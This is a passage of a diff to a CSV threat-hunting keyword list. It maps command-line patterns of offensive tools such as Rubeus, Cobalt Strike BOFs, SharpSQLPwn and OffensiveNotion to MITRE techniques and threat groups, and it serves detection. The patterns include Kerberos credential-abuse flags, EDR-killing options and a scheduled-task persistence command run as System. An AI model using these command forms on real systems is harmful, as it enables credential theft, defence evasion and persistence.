TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"* $payload_oneliner *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"* * 0x* - HOOK DETECTED*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* */lsass.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "* ./sf.py -l 127.0.0.1:5001*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* ./tor.keyring *","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* .\tor.keyring *","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* .beacon_keys -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"* .beacon_keys -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "* /.exegol/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* /altservice:ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /asrepkey*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /altservice:ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /asrepkey*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* /cmdtech:* /cmd:* /impuser:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /cmdtech:* /cmd:* /query:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" -"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /credpassword*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /creduser:* /credpassword:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ldap * /printcmd*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ldapfilter:'admincount=1'*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /credpassword*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /creduser:* /credpassword:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ldap * /printcmd*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ldapfilter:'admincount=1'*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* /modules:* /target:* /linkedsql:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /NAME:* /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" -"* /nofullpacsig *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /outfile:* /spn:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /outfile:* /spns:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /nofullpacsig *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /outfile:* /spn:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /outfile:* /spns:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* /PID:* /DRIVER:*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "* /PID:* /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" -"* /pwdsetafter:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /pwdsetbefore:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /rc4opsec *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /s4uproxytarget*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
